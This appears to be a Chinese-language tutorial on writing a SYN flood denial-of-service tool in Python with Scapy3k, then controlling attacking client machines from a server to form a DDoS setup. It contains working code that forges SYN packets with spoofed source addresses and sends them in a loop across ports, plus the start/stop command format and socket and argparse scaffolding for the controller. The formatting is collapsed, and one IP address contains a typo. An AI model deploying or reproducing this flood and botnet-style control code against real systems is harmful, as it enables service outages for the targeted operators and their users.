一、用Python的Scapy--Scapy3k实现泛洪攻击
基础知识介绍:
SYN介绍
SYN 泛洪攻击
Scapy3k官方文档
先安装scapy:sudo pip3 install scapy-python3
用Scapy构造一个简单的数据包看一下:pkt = IP(dst="192.168.0.100")
构造SYN数据包: IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")
以上构造了一个IP包和TCP包并将它们组合到一块,这样就有了一个完整的TCP数据包,否则是无法发送出去的。IP包中我们指定了源地址src和目的地址dst,其中src是我们伪造的地址,当然这也是DoS攻击中保护攻击者的一种方式。flags的值我们设定为S,说明我们要发送的是SYN数据包。非常简短的一段指令就够造了一个伪造了源IP地址的SYN数据包。
接下来就要发送pkt = IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")send(pkt)
代码实现(用Python随机生成IP地址、端口发送SYN数据包):
import randomfrom scapy.all import *def synFlood(tgt,dPort): srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags="S") packet = ipLayer / tcpLayer send(packet)
二、上面就完成了基本的脚本实现SYN泛洪攻击,现在采用客户端、服务器方式实现Ddos攻击
- 由于server端需要发送命令去控制Client端发送攻击,所以先规定命令格式
'#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>'
(-H后面是被攻击主机的IP地址,-p指定被攻击的端口号,-c控制攻击的开始与停止。) - 在server端解析命令就需要一个叫 argparse 的库,基本用法:
导入argparse库
import argparse
创建ArgumentParser对象
parser = argparse.ArgumentParser(description='Process some integers.')
添加参数
parser.add_argument('-p', dest='port', type=int, help='An port number!')
解析命令行参数
args = parser.parse_args()print('Port:',args.port)
上面创建了一个ArgumentParser对象,description参数是对命令行解析的一个描述信息,通常在我们使用-h命令的时候显示。add_argument添加我们要解析的参数,这里只添加了一个-p参数,dest是通过parse_args()函数返回的对象中一个属性的名称。type就是解析参数的类型。help指定的字符串是为了自动生成帮助信息。argparse默认就支持-h参数,只要在添加参数的时候指定了help的值就可以生成帮助信息了。
三、socket模块
Python中的socket提供了访问BSDsocket的接口,可以非常方便的实现网络中的信息交换。通常使socket的时候需要指定ip地址、端口号以及协议类型。通俗的讲主动发起连接请求的称为客户端,监听端口响应连接的我们称为服务器。
- 客户端
#导入socket库
import socket
#创建socket:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#建立连接
s.connect(('192.168.0,100', 7786))
- 服务器端
#导入socket库 import socketcliList = []
#创建socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#绑定地址和端口号 s.bind(('0.0.0.0', 7786)):
#开始监听 s.listen(10) while True:
# 接受一个新的连接: sock, addr = s.accept()
#将sock添加到列表中 cliList.append(sock)
在创建玩socket之后,要绑定一个地址和端口,这里的0.0.0.0表示绑定到所有的网络地址,端口号只要不是已经使用的端口号就可以了。之后开始监听端口,并在参数中指定最大连接数为10。最后循环等待新的连接,并将已连接的sock对象添加到了一个列表中。注意这里accept()默认是阻塞的,还可以通过settimeout()设定等待时间或者setblocking()设置为非阻塞模式,更多的相关细节可以查看Python官方文档。